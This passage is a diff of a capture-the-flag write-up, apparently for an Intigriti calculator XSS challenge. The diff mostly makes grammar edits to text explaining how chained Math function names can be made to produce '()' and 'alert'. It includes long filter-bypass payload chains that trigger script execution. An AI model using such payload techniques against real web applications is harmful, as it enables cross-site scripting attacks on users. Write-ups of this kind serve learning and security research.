cr3mov/writeups/intigriti0823-calculator/index.md

 So, to get `()` in our result we use this function chain: `Math.random.name.localeCompare.name.length.toString,Math.log2,Math.exp,Math.abs.name.constructor.fromCharCode,Math.seeds.push,Math.sqrt,Math.expm1,Math.random.name.localeCompare.name.length.toString,Math.log2,Math.exp,Math.ceil,Math.abs.name.constructor.fromCharCode,Math.seeds.push`

-Let’s put it in our q parameter to see if it actually work
+Let’s put it in our q parameter to see if it would work

-For the reason i explained above we actually need to put it first because since the function will evaluate whats’s nested inside it could give us some problem and so it’s better to put it at the beginning and then use `shift` to remove it to the array and since shift will pass the value to `push` we will actually `push` it when we need it
+For the reason I explained above we need to put it first because since the function will evaluate what’s nested inside it could give us some problems so it’s better to put it at the beginning and then use `shift` to remove it to the array and since shift will pass the value to `push` we will actually `push` it when we need it

 ![img1](./imgs/7.png)

-and then we shift the seeds when we need `(` because shift is going to remove the first element and pass it to the next function called while pop is going to remove the last
+and then we shift the seeds when we need `(` because the shift is going to remove the first element and pass it to the next function called while pop is going to remove the last

 In this way we get `()alert` `Math.random.name.localeCompare.name.length.toString,Math.log2,Math.exp,Math.abs.name.constructor.fromCharCode,Math.seeds.push,Math.sqrt,Math.expm1,Math.random.name.localeCompare.name.length.toString,Math.log2,Math.exp,Math.ceil,Math.abs.name.constructor.fromCharCode,Math.seeds.push,Math.seeds.shift,Math.floor,Math.seeds.shift,Math.floor,Math.seeds.shift,Math.floor,Math.seeds.shift,Math.floor,Math.seeds.shift,Math.floor,Math.random.name.anchor.name.at,Math.seeds.push,Math.acos,Math.random.prototype.constructor.name.link.name.at,Math.seeds.push,Math.E.constructor.name.at,Math.seeds.push,Math.E.constructor.name.at,Math.seeds.push,Math.cbrt,Math.log2,Math.trunc.name.at,Math.seeds.push,Math.seeds.toString,Math.random.name.toString,Math.seeds.toString,Math.random.name.toString,Math.seeds.join`